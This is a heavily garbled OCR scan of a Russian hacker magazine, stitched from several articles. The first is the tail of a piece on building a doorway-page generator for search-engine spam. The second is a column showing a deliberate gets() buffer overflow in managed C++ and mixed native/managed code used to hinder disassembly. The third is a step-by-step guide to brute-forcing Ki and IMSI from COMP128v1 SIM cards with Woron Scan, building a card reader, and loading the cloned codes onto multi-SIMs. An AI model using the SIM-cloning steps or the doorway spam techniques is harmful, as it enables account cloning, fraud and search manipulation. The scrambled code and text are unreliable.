
Рассмотренный в статье дорген — всего лишь демонстрация 
концепции. Ты можешь совершенствовать его практически 
бесконечно, оттачивая навыки создания софта для поисковой 
оптимизации. Еще раз посмотри на списоктого, что должен 
уметь идеальный дорген. Постарайся оценить его с позиции 
разработчика и начинай действовать. 

Советую начать с добавления механизма навигации и лин- 
ковки доров. Затем можешьусовершенствовать алгоритм 
распределения ключевых фраз потексту. Реализуй контроль 
объема текстовой информации, использование различных 
словарей (синонимов, опечаток и т.д.) и обработку исходного 
текста с помощью генератора цепей Маркова. 

И, самое главное, начни сам пользоваться своим доргеном. 
Тогда ты точно будешь знать, какая функциональность ему 
действительно необходима. 30 




> СІѴСІ 

Тебе легче вкурить 
тему ковыряясь в 
исходниках, чем читая 
описание алгоритмов 
и принципов работы 
программы? Нетпроб- 
лем — на диске тебя 
ждет дорген из статьи 
в виде проекта для 
Ѵівиаі 5Гис! іо 2008. 




> ѵѵагпіпд 

Помни, что исполь- 
зование дорвеев 
всеми без исключе- 
ния поисковиками 
относится к методам 
черной оптимизации и 
жестоко карается ис- 
ключением из индекса 
с одновременным 
внесением в Ыаск ІізТ 



При выборе плотности ключевых слов на странице важно соблюдать 
золотую середину. Заниженная плотность сделает ключевик неви- 
димым — понизит релевантность страницы по запросам, в которые 
он входит. Слишком высокая плотность — прямой риск попасть 
под категорию «поисковый спам» и заработать бан от поисковика. 
Устанавливай наиболее эффективную плотность опытным путем, 
ориентируясь на показатель 6-8%. 



Одна из серьезных проблем — контент для наполнения дора. Самый 
простой способ: позаимствовать с родственного ресурса. Он же и 
самый неэффективный. Дело в том, что поисковики давно научились 
распознавать и фильтровать дубли, склеивая результаты выдачи. Вы- 
ход — использовать системы автоматического перевода (прогнать 
текст «туда — обратно») . Или придать уникальности с помощью 
генератора текста на основе цепей Маркова. 
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|АЫ5І С, без реверансов в сторону нестан- 



дартных расширений от различных про- 



изводителей, которых развелось столько, 



что игнорировать их невозможно. Сего- 



дня мы поговорим об интимных взаимоот- 



ляемым [тападесі] кодом. 



КРИС КАСПЕРСКИ 



олгое время мы витали вок 






ТРЮКИ 
ОТ КРЫСА 



I 



I управляемый код на Си 



Официально платформа .ЫЕТ «крышует» С#, Р#, Ѵізиаі Вазіс и неко 
торые другие языки, в перечень которых Си, увы, не входит. Однако послед- 
ние версии компилятора М іеговой ѴізиаІС++ поддерживают возможность 
трансляции программ в управляемый байт-код (по «научному» называемый 
М5СІІ_ — МісговоЙСотппоп Іпіегтесііаіе І_апдиаде — Общий Промежуточный 
ЯзыкотМісговоЙ, но это слишком длинно и заумно, так что мы ограничимся 
термином «байт-код»). 

Если сделать небольшой пируэт, то можно писать Си программы на плюсах, 
транслируя их в байт-код. Конечно, «чистого» Си мы все равно не получим, 
но, по крайней мере, обретем возможность вызывать функции стандартной 
библиотеки ІіЪс, «химичить» суказателями ит. д. Естественно, в силу стро- 
гой типизации языка Си++ придется ругаться матом (нецензурным кастин- 
гом), впрочем, об этом мы уже говорили в #09Ъ. выпуске «трюков». 

Чтобы заставить приплюснутый компилятор генерировать байт-код, достаточно 
воткнуть в начало программы «ивіпд патезрасе 8узЬет; » и добавить к ко- 
мандной строке ключ «/СЬЯ», пример использования которого приведен ниже: 



I 



| управляемый код и переполняющиеся буфера 



Продвигая управляемый код на рынок, МісговоЙ неустанно пере- 
числяла его преимущества: а) более высокую производительность на чисто 
вычислительных задачах; б) решение проблемы переполняющихся буферов; 
в) наличие автоматического сборщика мусора, предотвращающего утечки 
памяти. 

Что касается производительности, то первые версии .ЫЕТ’а действительно 
обгоняли Си/Си++ программы в некоторых тестах за счет более компактной 
структуры байт-кода и динамической оптимизации при трансляции в память. 
Ноуже начиная с .ЫЕТ 2, производительность байт-кода заметноупала и 
положение спасаеттолькото, что байт-код способен без перекомпиляции 
исполняться на процессорах разныхтипов (х86, х86-64, ІА64), используя их 
преимущества, чего не может чистый машинный код. 

А вот контроль за буферами и сборка мусора реально работа ют только в С# 
программах (да и то не без оговорок). «Управляемый» код, полученный путем 
трансляции Си++ программы, наследует все худшие черты языка Си. Это мы 
сейчас и продемонстрируем на примереумышленного переполнения буфера: 



Неііо.срр — программа на Си++, подготовленная ктрансляции в 
управляемый код и вызывающая функции стандартной библиотеки 
языка Си 

#іпс1исіе <зДсІіо.]і> 

// используем пространство имен Зузйет (из .ЫЕТ) 
изіпд патезрасе Зузйет; 
ѵоіеі таіп ( ) { 

ргіпйі ( "Ьеііо , пезиті'Хп"); 

} 

Трансляция указанного кода в исполняемый файл из командной строки 
осуществляется следующим образом: 

$с1 . ехе /СЬЕ Ъеііо . ерр 

Если все сделано правильно, на диске образуется файл Ьеііо. ехе, гото- 
вый к непосредственному исполнению и победоносно выводящий «Ьеііо, 
пегиті!» на экран. 



Программа, подготовленная ктрансляции в управляемый код 
и допускающая переполнение буфера 

#іпс1ис5е <зйсІіо.]і> 

#іпс1исіе <зйгіпд.Ъ> 
изіпд патезрасе Зузйет; 

ѵоіеі таіп ( ) { 

сііаг ЬиіО [Охб] ; ейаг Ьиіі [Охб] ; сііаг Ъиі2 [Охб] ; 

ргіпй і ( " епйег зйгО : " ) ; дебз (ЬиіО ) ; 

ргіпйб ("епйег зйгі : " ) ;дейз (Ьиіі) ; 

ргіпйі ( "епйег зйг2 : " ) 123 ;дейз (Ъиі2 ) ; 

ргіпйб ( "уоиг зйг із : %з , %з , %з\п" ,ЬиіО ,Ьиі1 ,Ьиі2 ) ; 

} 

Компилируем написанную программу вуправляемый коде помощью ключа 
/СЬР. и смотрим: сможетли она справиться с ошибкой переполнения или нет. 
Мы имеем три массива по ОбЪ. байт каждый, куда вводим строки длинной в 
09Ъ. байт(эта величина выбрана произвольно). 
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Результат не заставляет себя ждать: 

$1іе11о-оѵег . ехе 
епСег зДгО : 111111111 
епСег зДгІ :222222222 
епСег зЪг2 :333333333 

уошг збг із :1111111122222222333333333 ,222222223333333 
33, 

333333333 

Как видно, вЬиРО «магическим»образом попали всетри строки. ВЬиРІ 
— вторая и третья строка; ЬиР2 выглядит неповрежденным, но затирает 
находящиеся за ним данные (которых в нашем случае нет). В общем, все 
происходиттак, как и следовало ожидать. Буфера последовательно разме- 
щаются в памяти, а переполнение одного из них воздействует на после- 
дующие. В защиту управляемого кода упомянем невозможность подмены 
адреса возврата из функции, а точнее нетривиальной этой операции, по- 
скольку архитектура виртуальной машины (сучетом компиляции части кода 
в память) чрезвычайно запутана и реализовать целенаправленную атаку с 
захватом управления намного сложнее. Так что какой-то смысл в управляе- 
мом коде все же есть, но утечки памяти — это кошмар! Управляемый код, не 
обремененный искусственным интеллектом, не может отличить ситуацию 
«выделил память и забыл освободить» от«выделил и решил (пока) не 
использовать». Сборщик мусора реально «отлавливает» лишь небольшую 
часть ошибок, когда указатель на динамическую память присваивается 
локальной переменной функции и «погибает» вместе с ней при закрытии 
стекового фрейма. Стоит функции перед выходом передать этотуказатель 
кому-то еще или сохранить его в глобальной переменной — все! Сборщик 
мусора его не тронет. 




смесь управляемого и неуправляемого кодов| 



і- X* ^ Ппиппжрния критические к производительности, а также програм- 
мы, взаимодействующие с«внешним» миром (например, оборудованием), 
пишутся на смеси управляемого и неуправляемого кодов. Ксчастью, язык 
С# позволяет вызывать управляемые модули, написанные на Си++, из 
которых в свою очередь можно вызывать «нативные» (паііѵе) функции, 
компилируемые в машинный код. 

Формально, виртуальная .ЫЕТ-машина поддерживает механизм Р/Іпѵоке, 
предназначенный для прямых вызовов нативного кода, но в языках 
С#/Си++ он реализован не лучшим образом и для решения поставленной 
задачи приходится совершать большое количествотелодвижений. Но мы 
не боимся трудностей! 

Для начала напишем Си++ программу, предназначенную для компиляции 
в машинный код. В ней нет ничего сложного за тем исключением, что все 
«экспортируемые» строки должны быть представлены в формате ІІпісосІе: 

паііѵесосіе.срр — Си++ программа, предназначенная для компиляции 
в машинный код 

#іпс1исіе "збгіпд.Ь" 
ііпсіисіе "паСіѵесосіе . Ъ" 

ѵоі паСіѵе_боо (ѵѵс!іаг_ * с, іпС пит) 

{ 

>7с1іаг_і: * з = Ь"1іе11о, іЫз із па^іѵе сосіеі"; 
мсзпсру_з(с, пит, з, Ѵ7сз1еп(з)); 

} 

Тутже создадим заголовочный файл [паііѵесосіе . Ь) с прототипом функ- 
ции паІіѵе_Роо () , включаемый в остальные файлы проекта: 

ѵоі паС і ѵе_і оо ( ѵѵс!іаг_ * с, іпі: пит) ; 

Теперь пишем Си++ программу, транслируемую вуправляемый код и вызы- 
вающую нашу нативную функциюпаСі ѵе_^оо () , что достигается за счет 
использования конструкции «геі сіазз СРРСІазз»: 



сігсосіе.срр — Си++ программа, подготовленная ктрансляции 
в управляемый код и вызывающая нативную 
функцию паІіѵе_!оо() 

#іпс1шіе "паДіѵесосІе.Іі" 
изіпд патезрасе ЗузДет; 

патезрасе зоигіг { 
геі сіазз СРРСІазз { 
риЫіс: 

зеаТіс ЗДгіпд л Тоо_тгаррег ( ) 

{ 

\л7сЬ.аг_с с [0x69] ; 

паДіѵе_іоо (с , зІ 2 еоб(с) / зігеоі (с [0] ) ) ; 
геСигп дсп ем ЗДгіпд(с) ; 

} 

} ; 

} 

Остается только заточить С# программу, вызывающую метод Иоо_ 
ѵігаррег ( ) из Си++ программы. В свою очередь метод вызывает нативную 
фун кцию па Ііѵе_Роо О — что осуществляется посредством конструкции 
«СРРСІазз . Роо_ѵ7гаррег ( ) »: 

ргодгат. сз — программа на С#, вызывающая метод ^оо_ѵѵеаррег() из 
управляемого Си++ кода, который затем вызывает нативную функцию 
паІіѵе_{оо() 

изіпд ЗузДет; 
изіпд зоигіг; 

патезрасе пегиті 
{ 

сіазз Ргодгат 
{ 

зеаеіе ѵоі сі Маіп ( зДгіпд [ ] агдз) 

{ 

зегіпд з = СРРСІазз . іоо_ш:аррег ( ) ; 

Сопзоіе .МгіДеЬіпе (з) ; 

} 

} 

} 

Атеперь собираем все это вместе с помощью следующего командного 
файла: 

таке.ЬаІ — командный файл, собирающий все файлы проекта вое- 
дино 

$с1.ехе /с /МБ паДіѵесосІе . ерр 
$с1.ехе /сіг /ЬЫ /МБ сігсосіе.срр паСіѵесосІе . оЬз 
$сзс.ехе /ДагдеД ітосіиіе /асісітосіиіе : сігсосіе .пебтосіиіе 
Ргодгат. сз 

$1іпк. ехе /ЬТСС /СЬКІМАСЕТУРЕ: I «Ж /ЕЫТКУ : пегиті . 
Ргодгат. Маіп / ЗОВЗУЗТЕМ : СОЫЗОЬЕ / АЗЗЕМВЬУМОШЬЕ : 
сігсосіе . пеДтосІиІе /ОІІТ :тіх. ехе сігсосіе . оЪз паСіѵесосІе . 
оЬд ргодгат. пеДтосІиІе 

Если сборка прошла успешно, на диске образуется тіх.ехе файл, заглянув 
в который дизассемблером, мы увидим смесьуправляемого и неуправ- 
ляемого кодов. Проблема в том, что ЮА Рго (самый популярный хакерский 
дизассемблер) не поддерживаетсмешанный режим и показываетлибо 
машинный, либо управляемый код, взависимости отнастроек, выбранных 
еще на стадии загрузки исследуемого файла в базу. А потому написание 
«смешанных» программ — хороший защитный прием, существенно за- 
трудняющий анализ (большинство начинающих хакеров вообще неувидят 
машинный код в .ЫЕТ сборке и будут долго гадать, какже все это работает). 
Отладка «смешанных» программ, не содержащих отладочной информации 
(поумолчанию она не генерируется) — вообще кошмар, серьезно напря- 
гающий даже гуру. ЕЕ 
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Полтора десятка мобильных аккаунтов на одной 8ІМ’ке. 



Так уж случилось, чел я подвижный. 
Мотаюсь из города в город по делам 
или просто в гости, а поскольку ро- 
уминг у нас по-прежнему грабитель- 
ский, то расходы на телефон выходят 
неслабые. Иной раз забредаешь 
в такую глушь, что ловят лишь счи- 
танные операторы. Вот и приходится 
регистрироваться у кучи разных 
ОПСОСов и таскать с собой тьму $ІМ- 
карт. Сначала я ныкал их под крыш- 
кой аккумулятора, но потом надоело. 
Стал искать другие пути. Как оказа- 
лось, наработок немало. 

Н СОКРОВИЩА ГОПОРЫНКОВ 

Пошарив по местным гоповн и кам, торгующим сотовыми и всякими 
прибамбасами к ним, я наткнулся на несколько решений. Первое, одно из 
самых примитивных и древних, это вынос БІМ-карт посредством гибкого 
шлейфа изтелефона наружу, в накладной задник. Сам понимаешь, выгля- 
дитэто очень коряво — накладка портит весь дизайн. Есть и второй вари- 
ант— более компактный, но суть та же. Берутся две стандартные БІМ-карты 
и из каждой вырезается острыми ножницами пятачокс контактами (под 
ним находится процессор, а остальная часть карты — безмозглый пластик). 
Затем пятачки вставляются в специальный переходник, в котором также 
смонтирована схема мультиплексор, переключающая карточки либо через 
меню, либо посредством включения-выключениятелефона (при каждом 
оп/ой происходит выбор новой БІМ-карты). Получившаяся конструкция за- 
совывается на место штатной 5ІМ-ки. Метод хорош, нотребует прямых рук, 
да и не в каждый телефон можно запихать подобную фиговину. Например, 
в мой Біетепв БК65 она банально не влезет — слишком узкий и плоский 
картодержатель. Ктомуже, максимальное число карт, которые можно туда 
запихать, равняется двум. 



Самый продвинутый способ — использование МиШ 5ІМ. Например, очень 
популярна БіІѵегСагсІ. Представляет из себя обычную 5ІМ-ку (только 
серебристого цвета и без опознавательных знаков). При вставке в телефон 
появляется дополнительное меню, где можно выбрать на какой номер 
переключиться. Всего в БіІѵегСагсІ можно забить от десяти до шестнадцати 
аккаунтов, в зависимости от версии прошивки. Также существует Згееп 
Сагсі, А-5ІМ и прочие аналоги. Различие между ними лишь в количестве 
ячеек, размере записной книжки и количестве запоминаемых 5М5. 

В КАК ЭТО РАБОТАЕТ 

Чтобы понять, что представляет собой 5ІМ-карта, нужно разобрать процесс 
аутентификации в сети. Внутри крошечной симки находится довольно 
мощный микроконтроллер, какправило, РІС, со своей микрооперационной 
системой, специфическим интерфейсом и набором функций. Последних 
там немного — чтение и запись в память, выдача сообщений на экранте- 
лефона, манипуляции с определением номера и, главное, генерация кодов 
для декодирования голосового потока и аутентификации в сети. БІМ-карта 
имеет своеобразную файловую систему, хранящую в себе кучу служебной 
информации, а также 5М5 сообщения и коды доступа в сеть — Ігйегпаііопаі 
МоЬіІеБиЬзсгіЬег ІсІепМу (ІМ5І) и КеуЬг ісіегйійсаііоп (Кі) коды. 

ІМ5І и Кі хранятся в БІМ-карте иу оператора (это каклогин и пароль). 
Упрощенно процедура регистрации в сети выглядит следующим образом. 
Мобильный телефон передаетбазовой станции свой ІМБІ-код. В ответ 
станция генерирует случайное число и отсылает его в телефон. Телефон 
передаетэто число в БІМ-карту, где процессор карты пропускаетего и 
Кі-код через хэш алгоритм. Одновременно это случайное число и Кі, 
связанный с данным ІМ5І, проводится через такойже алгоритм на базовой 
станции. Затем БІМ-карта отдает хэш телефону, а тот отсылает его на базо- 
вую станцию, где происходитсверка с хэшем, полученным при внутреннем 
прогоне выданного случайного числа и Кі. Если числа совпадают, значит 
— абонент тот самый и происходит регистрация в сети. Хэш сохраняется 
в памяти телефона и базовой станции в качестве ключа для кодирова- 
ния и декодирования голосового потока. Как видишь, Кі-код никогда не 
покидает ни базовую станцию, ни БІМ-карту и выдрать его оттуда напрямую 
практически невозможно. Точнее, способ есть, но связан он стакими 
дикими затратами денег и времени (осуществляется посредством опили- 
вания кристалла процессора на спецоборудовании и непосредственного 
считывания из памяти в обход СРІІ контроллера), что вряд ли с этим кто-то 
будет заморачиваться. 

Для клонирования БІМ-карты нужно знать и ІМ5І, и Кі коды. Что же делать 
в таком случае? Ответ прост — брутфорс. Хэш алгоритм не идеален и в 
большинстве случаев удается вычислить Кі-код по ответам БІМ-карты. 
Проблема втом, что БІМ-карта обладаетограниченным числом обращений 
калгоритму генерации хэша. После их исчерпания симка блокируется на- 
мертво, и ты можешь смело смыть ее в унитаз, а лучше пойти с ней к опера- 
тору и, прикинувшись шлангом, сказать, что вдруг сломалась. С вероятно- 



► ііб 
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СПИСОК РАДИОДЕТАЛЕЙ. 

Можешь с ним идти на радиорынок 
или в магазин радиодеталей. Там 
тебя поймут :). 

Резисторы на 0.125 Вт (можно и на 0.5 Вт, 
но не желательно) номиналом: 

2.2 КилоОм — 1шт. 

10 КилоОм — 4шт. 

15 КилоОм — 1шт. 

22 КилоОм — 1шт. 

1 МегаОм — 1 шт. 



Конденсаторы электролитические: 
470 Микро Фарад 25 вольт — 2шт. 

Диоды: 

1Ы4148 или аналог — 3 шт. 

Светодиод: 

Любой из маленьких. На 3.5 вольта. 

Транзисторы КТ3102Д — 1 шт. 
Кварц на 3.579545 МГц — 1шт. 
Микросхема 74НС04 — 1шт. 




Конденсаторы керамические: 

33 ПикоФарады — 2 шт. 

100 Нанофарады — 2 шт. 



Также прикупи стандартную розетку 
СОМ разъема — ОВ-9 или оторви ее от 
древней мыши. 



Виды МикіЗІМ карт. 



8 і 1 ѵег Саггі — наиболее 
распространенная платфор- 
ма, при этом совершенно 
открытая. Онаже является 
самой дешевой и переклю- 
чается быстрее всех. Лишена 
некоторых фишечек, впрочем, 
думаю, их можно реализовать 
программно, просто никто 
толком не занялся. Построена 
на контроллере РІС16 и флеш 
памяти серии 24Ьхх. Прошив- 
ку можно беспрепятственно 
слить или заменить другой. 
Можно модифицировать как 
душе угодно, конечно, если 
квалификации хватит. Обыч- 
но на Бііѵег Сагб вкручивается 
что-либо вроде 5іт-Ети ѵб.1 
или аналогов. 

Карты Сгееп и бгееп 2 
— модификации Бііѵег карты. 



Отличаются количеством 
встроенной памяти. В класси- 
ческом Зііѵег’е — 64 килобай- 
та памяти, у Сгееп — 128, у 
Сгееп 2 — аж 256. Количество 
памяти влияет лишь на число 
сохраняемых номеров и 5М5. 
Карты Сгееп встречаются 
крайне редко, так как практи- 
чески полностью вытеснены 
картами Сгееп 2 . 

Еще существует т.н. Соіб 
Сагб — но внимания она не 
достойна, таккак, во-первых, 
изначально имела слишком 
мало памяти (16 килобайт), а 
во-вторых, прошивку для нее 
так и не довели до ума. Для 
прошивки этих карточек нуж- 
но использовать специальный 
программатор, что осложняет 
их использование. Впрочем, 
если тебе удастся купить кар- 
точку с прошивкой не ниже 
ЗітЕти ѵб.1, то все действия 
можно будет проводить прямо 



с телефона через менюшку. 
Китайцы как всегда подсуети- 
лись и выпустили свой аналог 
Бііѵег/Сгееп карт под названи- 
ем 8ІММАХ. Перешить или 
изменить в них прошивку уже 
нельзя, но зато и от пользо- 
вателя требуется минимум 
телодвижений — все делается 
либо с телефона, либо через 
специальный геабег, обычно 
идущий в комплекте . 

Ну и, конечно, не стоит забы- 
вать про нашу российскую 
разработку — штуку под 
кодовым названием А-8ІМ. 
От привычных Сильверов от- 
личается тем, что для работы 
с ней достаточно обычной 
читалки. Сама карточка чуть 
тоньше, чем стандартная 
Зііѵег Сагб, а значит, ее проще 
резать для вставки в пере- 
ходник 2іп1. Поддерживает 
функцию «тайной записной 
книжки». «Тайная книжка» 
не дает телефону сохранять 
в исходящих/входящих 



списках телефона внесенные 
в нее номера и позволяет 
переключать номера по 
хоткеям (например, 1111 
и вызов — переключить на 
первый номер; 2222 и вызов 
— на второй номер и так 
далее) . Количество функций 
постепенно увеличивают, так 
как разработчики не стоят 
на месте . А еще исправлен 
баг, из-за которого 8і1ѵег Сагб 
и ее аналоги отказывались 
работать в некоторых Нокиях. 
Из недостатков: переключе- 
ние через меню стало на один 
пункт глубже. Некоторые те- 
лефоны перезагружаются при 
смене номера, причем, это не 
баг, а фича (разработчики А- 
5ІМ считают, что так коррект- 
нее). На отдельных мобилах 
смена номера происходит 
в разы дольше, чем на Зііѵег 
Сагб. Кроме того, А-5ІМ — это 
закрытая платформа, шалов- 
ливые ручонки с дебаггером в 
нее уже не запустишь . 
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5іт Неасіег в сборе. Разъем для ка 
Нокии 31 10 



Ьаѵе для любого гика. Так что вопрос об изготовлении подобной штуковины 
должен быть решен однозначно. 



г ЧТО МНЕ ЗА ЭТО БУДЕТ? 

Надо сказать, опсосы не особо приветствуют такое использование карт. 
Понять их можно, они лишаются потенциальней прибыли, так какты мо- 
жешь позвонить с другого оператора, когда тебе это выгодней. Но они ни- 
чего и нетеряют, так как каждый аккаунт по-прежнему имеетсвой баланс 
и ты вынужден класть туда бабло, чтобы общаться. Поэтому категорически 
против не выступают. Да и в отличие от банковских смарт-карт, 5ІМ-ка 
является собственностью абонента, а значит, ты можешь делать с ней что 
угодно. Формально использование МиШВІМ —то же самое, что таскание 
кучи ВІМ-картв кармане, только болеетехнологичное. Единственное, 
что вызоветзаконное возмущение — это одновременное использование 
оригинала и дубликата карты. В этом случае с большой вероятностью 
заблокируют аккаунт, и тебе придется идти в абонентский отдел и получать 
новую 51 М-карту с другим набором ІМ5І-КІ. 



стью, близкой к 100%, тебе выдадут новую (на халяву или за минимальную 
плату), а старую заблокируют. Но не все так страшно, карта позволяет 65536 
обращений, а для подбора Кі этого, как правило, более чем достаточно. 
Правда, существует одна тонкость, а именно — хэш алгоритмов на данный 
момент используется два вида: СОМР128ѵ1 и СОМР128ѵ2. Первый легко 
поддается взлому, а вот второй пока забрутфорсить не удалось. Впро- 
чем, если сильно захотелось поиметь в мультисимке карту на алгоритме 
СОМР128ѵ2,то можно сделать финтушами — вырезать из ЗіІѵегСагсІ пятак 
с процессором и вставить ее в блокдва в одном, на парус проблемной. 

^ ЗАЧЕМ? 

Нуладно, я путешественник, и эти штуковины мне реально пригодятся. А 
ты, например, пользуешься всюжизньодним итемже оператором. Естьли 
тогда необходимость в ухищрениях? 

Сколько раз мультисимка выручала меня, когда вдруг кончалось бабло на 
основном номере; когда не ловил оператор; когда в данной зоне наотрез 
отказывался работать 6РВ5, а срочнотребовался доступ в Инет. Да и 
запустить залоченный девайс, привезенный из-за бугра, не вмешиваясь 
в его прошивку, например, тот же іРЬопе или какой-нибудь редкий или 
новомодныйтелефон, РСМСІА05М Мосіет, выданный на халяву ваме- 
риканском отделении Т-тоЫ1е... Короче, я считаю, что МиШЗІМ это гпиві: 



Н КАК? ГДЕ? ЧЕМ? 

Итак, ты решился сделать себе мультисим. С чего начать? Надыбать саму 
МиШ5іт карту. Можно поискать на радиорынках, можно — в онлайн мага- 
зинах (набери, в Яндексе «ЗіІѵегСагсІ» или «МиШвіт»). Я же свою купил в 
каком-то полуподвальном шопе, торгующем подержанными мобилами. Я 
просто подошел и спросил, не делаютли они мультисимки. Оказалось, де- 
лают. Воту них и купил — вышло дороже, чемуказано в инете, но дешевле, 
учитывая стоимость пересылки до Челябинска. Главное, чтобы мультисим- 
ка была с прошивкой ЗітЕти не ниже шестой версии, так как иначе можно 
нарваться на пустую болванку и долго искать программатор. Этот вопрос 
нужно сразу уточнитьу продавца. В среднем, адекватная цена за МиШвіт 
СагсІ — 250-500 рублей, в зависимости от модели. 

Допустим, карточку ты достал. Остается распотрошить свои БІМ’ки, 
выдрать из них заветные коды и забить их в МиШЗІМ. Можно, конечно, 
поручить это мутным дядькам с радиорынка или из других подозрительных 
конторок. За грабление одной 5ІМ-карты они берут порядка ста рублей. 
Вроде недорого, однако информация для доступа к твоему мобильному 
аккаунту попадет в третьи руки — большое западло! 

Поэтому ломать будем сами. Тебе потребуется читалка 5ІМ-карти софтина 
брутфорсер. В качестве софта я использую проверенную временем 
5іт5сап, но она довольно медленная, поэтому лучше заюзать более 
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Моя козырная ЗіІл/егСагб! Немножко подпиленная, так как не влезала 



продвинутый ѴѴогоп 5сап, вычисляющий Кі код за меньшее число обра- 
щений. Читалку можно купить в интернет-магазине или сделать самому из 
подручного хлама. Далее будет приведен мануал по изготовлению читалки 
в домашнихусловиях, а также мануал по пользованию софтиной и инструк- 
ция по забиванию кодов в ЗіІл/егСагб. 

^ ВАЯЕМ КЕАРЕК 

Если ты решил зажмотить бабло и своими руками склепать читалку 
5ІМ-карт, то этот раздел для тебя. В противном случае можешь его смело 
пропустить. 

Схема выполнена печатным монтажом. Рисунок платы и специальную 
программу ты найдешь на диске. О том, как изготавливать высококачест- 
венные печатные платы посредством утюга и лазерного принтера по ме- 
тоду «ЛУТ», написана не одна сотня статей, поэтому на этом я заострять 
внимание не буду. На всякий случай на дискеты найдешь подробное ру- 
ководство по лазеро-утюжной технологии изготовления плат. А если не 
хочешь заморачиваться или утебя нет лазерного принтера, то можешь 



аккуратно перерисовать дорожки на фольгу текстолита посредством 
водостойкого маркера, а потом кинуть все это дело в раствор медного 
купороса или хлорного железа. В конце концов, можешь склепать схему 
на куске картона, соединив все проводками — мой первый геабег был 
именно таким. 

Из инструментов тебе потребуется паяльник помельче и дрель с 
миллиметровым сверлышком. Также нужен кусочек текстолита 6 на 4 
см и ряд радиодеталей, перечень которыхты найдешь на врезке. Стоят 
они в сумме около 50 рублей. Расположение и номинал каждой детали 
подробноуказаны на рисунке. Немного терпения, прямые руки... и все 
утебя получится. При монтаже особое внимание удели пайке микро- 
схемы, транзисторов и диодов. Все они боятся перегрева, поэтому паяй 
краткими касаниями. Место пайки надо хорошенько смазать флюсом 
(рекомендую ЛТИ-120) — паяться будетв разы проще и качественней. 
Аккуратнее на впайке транзисторов, конденсаторов и диодов. Тут глав- 
ное не перепутать полярность и выводы. Поэтому сверяйся с рисунками. 
Самое сложное это найти разъем для подключения 5ІМ-карты. Если 
живешь в крупном городе, разъем можно купить в радиомагазине. Но 
вот вдали от цивилизации найти такую штуковину куда сложнее. Не 
долго думая, я отрезал задницу от дохлой Ыокіа 31 1 0 и использовал ее в 
качестве разъема. 

Есть одна тонкость — постарайся не делать провода от ридера до компа 
длиннее, чем полметра (меньше наводок будет). Кстати, можешь наклепать 
ридеров и сбагрить их по спекулятивной цене на радиорынке, компенси- 
ровав баблом затраченные на изготовление нервные клетки. В свое время 
я так и поступил. 

^ І_ЕТ’5 60 ЗНАКЕ, ЗНАКЕ! 

Итак, ридер ты себе купил/спаял/одолжил. Пора приступать непосредст- 
венно к выковыриванию Кі кода. Подключи читалку к СОМ-порту, засунь в 
нее 5ІМ-карту и запускай ѴѴогоп 5сап. В меню «Сагб Пеабег» выбери пункт 
РЬоепіх Сагб. Затем переходи в раздел Сагб Пеабег ЗеШпдз и выбирай 
скорость порта 9600 и номер порта, к которому подключен ридер. Теперь 
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нажми кнопку Р5Т в верхнем меню. Произойдетсброс карточки, а в логах 
появится что-то вроде: 

ТЪе геаі зреесі із 9600. . 

ТЪеге із а сагсі іп РЪоепіх сіеѵісе: 

АТК: 

ЗВ 9В 95 80 1Р 43 80 31 30 73 32 21 00 53 25 99 
01 ББ 



Если не появилось, значит, проблема либо с симкой, либо с ридером. Но 
надеюсь, у тебя все О К. Можно жать кнопку ІМБІ и получать в окне логов 
свой ІМБІ-код. 

Осталось получить Кі-код. Для этого нажми кнопочку Кі и БТАРТ — прога 
спроситтвой РІЫ-код (без него нельзя получить доступ кБІМ-карте] и 
начнет подбор заветного числа. Предупреждаю сразу, подбор долгий. 
Поиск первого байта кода Кі можетзанять больше часа. Первый байт 
всегда долго ищется, зато остальные находятся в течение нескольких 
минут. Примерно на 60000 попытках программа автоматически прекра- 
щает перебор, чтобы избежать блокировки карты по счетчику обраще- 
ний. В таком случае повторный запуск брутфорсера не имеет смысла. 
Если за 60000 запросов ничего не получилось, то не судьба. Эта карта не 
ломается, такое бывает. 

Ну, а после удачного брута искомые коды будут в логах. Перепиши их куда- 
нибудь на бумажку и занычь от посторонних взглядов. 

Если Ворон никак не может начать взлом, ссылаясь на какие-то ошибки, 
попробуй программу БітБсап. У нее нетакой продвинутый алгоритм, зато 
порой она на раз жрет проблемные симки. Выбрал порт, скорость и нажал 
кнопку РіпсІ Кі. 

Так, данныеу нас есть, осталось забить их в МиШБІМ карту. 

Вставляй ее в телефон и лезь в БІМ-меню (например, у Біетепв оно появ- 
ляется в разделе «Еще»]. Там должно появиться Біт-Ети 6.01 5 (если утебя 
А-зіт или что-либо, отличное отБіІѵег’о подобных карт, то строка меню 
будет зваться по-другому]. 

Заходи туда и увидишь главное меню мультисимки. Итак: 



ЗеІ.РЬопе — позволяет выбрать текущий активный номер. 
Тот, который в данный момент обозначается плюсиком. 
Соп^ідиге — меню настройки мультисимки, о нем чуть ниже. 
Іп^огшабіоп — немного служебной инфы, залезь и узнаешь 
сам. 

Кезеб — перезагрузка телефона. Так, чисто по приколу : ) . 
Влезай в раздел СопЛдиге. ты увидишь: 

Есііі # — редактирование названий слотов, в которые ты будешь загружать 
свои сграбленные симки. Можешь написать что-нибудь вроде Вееііпе или 





— я я ш : л. ѣ а : —— 

Главное окно программы ѴѴогоп Бсап 



номертелефона загружаемой симки. Я рекомендую вписать именно номер, 
так какой будет отображаться на экране прямо под надписью оператора. 
Согласись, две строчки Вееііпе друг под другом будут выглядеть немного 
странно. 

СопЛд.Роз — непосредственно ввод данных в мультисимку. Выбираешь 
этот пункт, телефон запросит РІ N2 (по дефолту обычно 1 234]. Затем спросит 
номер позиции, которую надо будет отредактировать. Слоты тут нумеруются 
с нуля. Если ты забиваешь первый номер, то начни с «0». После выбора 
номера тебе предложат ввести ІМБІ. Внимательно вбей все 16 знаков и 
жми «ОК» или что там утебя в телефоне. Следом будет ввод Кі — тот еще ги- 
мор! Но, думаю, ты не ошибешься. Опять жми «ОК». Следующим вопросом 
будетжелаемый РІІК код. Введи любое число, не забыв предварительно 
записать его на бумажку. Наконец, ввод РІ N для данного слота. Опять же 
— задается любой. Если для всех слотов задать одинаковый РІЫ.то при 
включении мобила первым делом загрузит слот под номером 0, а вот если 
задать разные, то перед включением можно выбрать, какой слот за грузить, 
набрав его РІЫ-код. Удобно, правда? 

СопЛд.БМБ — позволяетзадатьчислохранимых в памяти 5М5. Задается 
исходя из возможностей карты. 

СопЛд.АОЫ — тутмы можем задать число ячеекзаписной книжки симки. 
Поскольку у меня все номера в телефоне, то я выставил 1 . 

РІМ2/РІІК2 — пункт меню, через который осуществляется смена РІ N2 и 
РІІК2 кодов. 

Егазе.Роз — удалить номер из БІМ-карты. Просто вводишь номер удаляе- 
